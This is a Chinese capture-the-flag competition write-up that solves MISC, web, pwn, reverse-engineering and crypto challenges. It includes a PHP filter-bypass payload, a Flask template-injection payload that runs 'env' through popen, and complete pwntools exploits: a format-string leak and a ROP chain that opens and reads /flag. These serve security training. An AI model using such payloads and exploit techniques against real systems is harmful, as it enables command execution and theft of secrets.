MISC

一眼盯帧

拿到的 mp4 视频使用脚本提取每一帧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import cv2

# 打开视频文件
video_capture = cv2.VideoCapture('C:/Users/Nanian233/Desktop/aa/a.mp4')

# 获取视频的帧率
fps = int(video_capture.get(cv2.CAP_PROP_FPS))

# 初始化帧计数器
frame_count = 0

while True:
    # 逐帧读取视频
    ret, frame = video_capture.read()

    # 如果视频读取完毕,则退出循环
    if not ret:
        break

    # 保存当前帧为图像文件
    cv2.imwrite(f"frame_{frame_count}.jpg", frame)

    # 增加帧计数器
    frame_count += 1

# 释放资源
video_capture.release()
cv2.destroyAllWindows()

然后把题目的 jpg 每一张手工提取成 txt(ex

直接用 z3 求解器求解多元线性方程即可

1
2
3
4
5
6
7
from z3 import *
a1,.....,a31= Ints('a1 a22 .... a31')
x = Solver()
#x.add(23*a1+40*a2+5*a3+76*a4+15*a5+39*a6+5*a7+.....*a31==135144)
if x.check()==sat:
    model = x.model()
    print(model)

解转 ascii 字符得到 flag

帕鲁服务器#1

拿到的 vmdk 文件挂载到虚拟机后使用 wireshark 检测流量即可得到

WEB

ezPHP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$a = 'O.U.C';

$query = $_SERVER['QUERY_STRING'];
parse_str($query);
if (preg_match('/_|%5f|\.|%2E/i',$query)){
    die('听说你是黑客');
}

echo '你知道b等于什么能绕过这个弱类型吗(〃` 3′〃)'.'<br>';
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
    echo "哎呦,不错喔".'<br>';
    $O_U_C=$_GET['O_U_C'];
    if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
        echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
        if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
            echo '好,那么好'.'<br>';
            if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
                echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
            }else{
                echo '告诉你secret的md5值也无妨,反正哈希是不可逆的๑乛◡乛๑,除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
            }
        }else{
            echo '不过如此';
        }
    }else{
        die("不行嘛(´ェ`)");
    }
}else{
    echo '嗨害嗨  (๑ᵒ̴̶̷͈᷄ᗨᵒ̴̶̷͈᷅)';
}

php 变量覆盖

preg_match()绕过

md5 强弱类型比较

hash 拓展攻击脚本(实际没有用到,怎么出题的 0.0)

?a=QLTHNDT&b=PJNPDWY&O%20U%20C=100%0a&md5=ouc

POST:md51[]=1&md52[]=2

cookie:md5=06d92f344c7d8c89cb164353ca0fa070

菜狗工具#1

flask 之 ssti 模版注入从零到入门 - 先知社区

payload:

找到 132 可用,global 找环境变量找到 flag

print("".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('env').read())

PWN

padded-fmt

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

elf = ELF('./padfmt')
p = process('./padfmt')
# p = remote('competition.blue-whale.me',20132)

# gdb.attach(p)
p.sendline(b'%x%x%x%x%x%x%pAAAA')
p.recvuntil(b'0x')
stack = int(p.recvuntil(b'AAAA').rstrip(b'A'), 16)
flag = stack + 0x470 
p.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%sAAAA'+p64(flag))
p.interactive()

baby_stack

经典栈迁移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *

context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./baby_stack')
libc = ELF('./libc-2.23.so')
p = process('./baby_stack')
# p = remote('competition.blue-whale.me',20135)

p.send(b'a'*0x140) 
stack = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))-0x150
print(hex(stack))
pop_rdi = 0x400b93
leave = 0x400a74

exp = p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['func'])
exp =exp.ljust(0x140, b'\x00')+p64(stack-8)+p64(leave)

p.send(exp)
p.recvuntil(b'again:\n')

puts = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))  #泄露出栈地址
libc_addr = puts - libc.sym['puts']
print(hex(libc_addr))
new_stack = stack-0x128
print(hex(new_stack))

oopen = libc_addr + libc.sym['open']
write = libc_addr + libc.sym['write']
read = libc_addr + libc.sym['read']
p.sendline(b'6')
syscall = libc_addr + 0x26bf
pop_rsi = libc_addr + 0x202f8
pop_rdx = libc_addr + 0x1b92

exp = p64(pop_rdi)+p64(new_stack+0xac)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(oopen)
exp += p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(0x601100)+p64(pop_rdx)+p64(0x30)+p64(read)
exp += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(0x601100)+p64(pop_rdx)+p64(0x30)+p64(write)
exp += p32(0) +  b'/flag\x00'
exp = exp.ljust(0x140, b'\x00')
exp += p64(new_stack-8)
exp += p64(leave)

p.send(exp)
p.interactive()

摩登 Pwn

tigervnc 连上去,输入非法值就可以获得 flag

Reverse

xor++:

没啥好说,直接梭就行

1
2
3
4
5
6
7
8
9
10
11
v4 = [ 
    ord("%"),ord("("),ord("$"),ord("!"),ord("<"),ord("*"),ord("<"),
    30, 20, 40, 36, 40, 41, 97, 50, 39, 63, 32, 12, 9, 32, 104, 55, 46, 4, 63, 53, 106, 17, 7, 4, 61, 14, 17, 38, 14, 26
   
]

v8=67
for i in v4:
    char=i^v8
    v8+=1
    print(chr(char),end="")

钩子:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# 给定的byte_7FF7BAB41410数据
byte_7FF7BAB41410 = bytes([0x88, 0xE3, 0xEE, 0x11, 0xC6, 0x49, 0x74, 0xA5, 0xDD, 0x98,
                           0x59, 0xE9, 0x48, 0xF7, 0x6E, 0xBF, 0x3A, 0xB3, 0x9B, 0xDF,
                           0x10, 0x42, 0xFF, 0x99, 0x6C, 0xE3, 0x3E, 0x05, 0x2C, 0x65,
                           0x47, 0xEF])

# 初始化v10为0到255的字节序列
v10 = [0]*256
for i in range(256):
    v10[i]=i
v9 = 0

# 执行循环操作
for j in range(256):
    # 注意:这里直接使用j % 32,因为0x20ui64等于32
    v9 = (byte_7FF7BAB41410[j % 32] + v10[j] + v9) % 256
    v10[j],v10[v9]=v10[v9],v10[j] # 交换v10[j]和v10[v9]

a1 = 26  # 给定的循环次数
v6 = 0
v8 = 0
v3 = a1 == 26  
data=[ 0x02, 0xCC, 0x47, 0xB3, 0x4D, 0x6C, 0xFD, 0x9A, 0x4C, 0x4E, 
  0xD4, 0x8B, 0x1E, 0x81, 0x19, 0x0A, 0x34, 0x26, 0xD0, 0xFF, 
  0x70, 0xB6, 0xB0, 0x92, 0x49, 0xB3]
# 执行循环操作
for k in range(a1):
    v6 = (v6 + 1) % 256  # 更新v6的值
    v8 = ((v10[v6] + v8) % 256)  # 计算新的v8值
    v10[v6],v10[v8]=v10[v8],v10[v6] # 交换v10[v6]和v10[v8]
    char=v10[(v10[v8]+v10[v6])%256]^data[k]
    print(chr(char),end="")

Crypto

Base64*rot13:

Cyberchef 选择 base64 解密并选择 rot13 模式

NeXT RSA

模!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from math import factorial
from functools import reduce

flag = "flag{xxxxxxxxx}"

def mooooo(s: str):
    res = 0
    for i in s:
        res <<= 8
        res += ( factorial(ord(i)) % 233 )
    return res

table = "abcdefghijklmnopqrstuvwxyz{}"
assert(reduce(lambda p,i:(i in table)*p, flag, True))

print(mooooo(flag))
# output: 2508450541438803643416583335895451914701844680466330955847

加密过程就是把先向左移动 8 位(类似于乘 2 的 8 次方),再加上每个字符的 ASCII 编码的阶乘模 233

因为已经给出了 flag 的字符范围,所以解密就是先把每个字符的 ASCII 编码的阶乘模 233 的结果求出来做成词典,把解密后得到的结果 output 模上 1<<8 得到的就是加上的字符 ASCII 编码的阶乘模 233 的结果,让它替换成词典中字符即可,然后把得到的 flag 反向输出就行

1
2
3
4
5
6
7
8
9
from math import factorial
table = "abcdefghijklmnopqrstuvwxyz{}"
output=2508450541438803643416583335895451914701844680466330955847
key={factorial(ord(i)) % 233: i for i in table}
flag=[]
while output:
    flag.append(key[output%(1<<8)])
    output >>= 8
print(''.join(flag[::-1]))